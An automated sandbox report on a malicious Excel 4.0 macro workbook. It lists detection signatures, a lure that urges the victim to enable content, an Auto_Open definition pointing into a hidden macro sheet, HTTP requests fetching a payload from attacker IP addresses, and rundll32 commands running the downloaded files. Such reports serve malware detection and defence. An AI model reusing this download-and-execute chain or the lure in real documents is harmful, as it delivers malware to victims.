Loading ...

Play interactive tourEdit tour

Analysis Report Comission_1980420924_03172021.xlsm

Overview

General Information

Sample Name:Comission_1980420924_03172021.xlsm
Analysis ID:383366
MD5:7c87c28b3c650992cca31f7728aa2cfd
SHA1:e278ae31532f3f65297d8c97d21080321cd79e9f
SHA256:c794d4aa56fd9e070e2a7ef2b18c08016da687eddb100350216cada8110074d9
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Allocates a big amount of memory (probably used for heap spraying)
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6036 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 4640 cmdline: Rundll32 ..\Kiod.hod,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3584 cmdline: Rundll32 ..\Kiod.hod1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5400 cmdline: Rundll32 ..\Kiod.hod2,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
Source: excel.exeMemory has grown: Private usage: 1MB later: 80MB
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 188.119.112.114:80
Source: global trafficTCP traffic: 192.168.2.5:49705 -> 188.127.230.104:80
Source: Joe Sandbox ViewIP Address: 188.119.112.114 188.119.112.114
Source: Joe Sandbox ViewIP Address: 188.127.230.104 188.127.230.104
Source: Joe Sandbox ViewIP Address: 185.82.219.75 185.82.219.75
Source: global trafficHTTP traffic detected: GET /44293.7328152778.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 188.119.112.114Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44293.7328152778.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.82.219.75Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 188.127.230.104
Source: unknownTCP traffic detected without corresponding DNS query: 188.127.230.104
Source: unknownTCP traffic detected without corresponding DNS query: 188.127.230.104
Source: unknownTCP traffic detected without corresponding DNS query: 188.119.112.114
Source: unknownTCP traffic detected without corresponding DNS query: 188.119.112.114
Source: unknownTCP traffic detected without corresponding DNS query: 188.119.112.114
Source: unknownTCP traffic detected without corresponding DNS query: 188.119.112.114
Source: unknownTCP traffic detected without corresponding DNS query: 185.82.219.75
Source: unknownTCP traffic detected without corresponding DNS query: 185.82.219.75
Source: unknownTCP traffic detected without corresponding DNS query: 185.82.219.75
Source: unknownTCP traffic detected without corresponding DNS query: 185.82.219.75
Source: unknownTCP traffic detected without corresponding DNS query: 188.119.112.114
Source: unknownTCP traffic detected without corresponding DNS query: 185.82.219.75
Source: unknownTCP traffic detected without corresponding DNS query: 185.82.219.75
Source: unknownTCP traffic detected without corresponding DNS query: 188.119.112.114
Source: global trafficHTTP traffic detected: GET /44293.7328152778.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 188.119.112.114Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44293.7328152778.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.82.219.75Connection: Keep-Alive
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://api.aadrm.com/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://api.cortana.ai
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://api.office.net
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://api.onedrive.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://augloop.office.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://cdn.entity.
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://clients.config.office.net/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://config.edge.skype.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://cortana.ai
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://cortana.ai/api
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://cr.office.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://dev.cortana.ai
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://devnull.onenote.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://directory.services.
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://graph.windows.net
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://graph.windows.net/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://lifecycle.office.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://login.windows.local
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://management.azure.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://management.azure.com/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://messaging.office.com/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://ncus.contentsync.
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://officeapps.live.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://onedrive.live.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://outlook.office.com/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://outlook.office365.com/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://settings.outlook.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://staging.cortana.ai
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://tasks.office.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://wus2.contentsync.
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 12Screenshot OCR: Enable editing button from the yellow bar above 12 ' Once you have enabled editing. please click En
Source: Screenshot number: 12Screenshot OCR: Enable Content bytton from the yellow bar above 13 14 jj 17 18 19 20 21 22 23 24 25 26
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Comission_1980420924_03172021.xlsmInitial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: Comission_1980420924_03172021.xlsmInitial sample: Sheet size: 19220
Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="22730"/><workbookPr/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="E:\Nowiy\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{E74EC3A0-E6C1-4379-B2DF-09ED883A9632}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-108" yWindow="-108" windowWidth="20376" windowHeight="12360" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="sheet" sheetId="1" r:id="rId1"/><sheet name="sheet1" sheetId="2" r:id="rId2"/><sheet name="sheet2" sheetId="8" r:id="rId3"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">sheet1!$AO$168</definedName></definedNames><calcPr calcId="162913"/></workbook>
Source: classification engineClassification label: mal64.expl.evad.winXLSM@7/9@0/3
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{40062FFA-61B8-40CB-BCCC-2F00295D9721} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe Rundll32 ..\Kiod.hod,DllRegisterServer
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe Rundll32 ..\Kiod.hod,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe Rundll32 ..\Kiod.hod1,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe Rundll32 ..\Kiod.hod2,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe Rundll32 ..\Kiod.hod,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe Rundll32 ..\Kiod.hod1,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe Rundll32 ..\Kiod.hod2,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Comission_1980420924_03172021.xlsmInitial sample: OLE zip file path = xl/drawings/drawing2.xml
Source: Comission_1980420924_03172021.xlsmInitial sample: OLE zip file path = xl/drawings/drawing3.xml
Source: Comission_1980420924_03172021.xlsmInitial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels
Source: Comission_1980420924_03172021.xlsmInitial sample: OLE zip file path = xl/drawings/_rels/drawing3.xml.rels
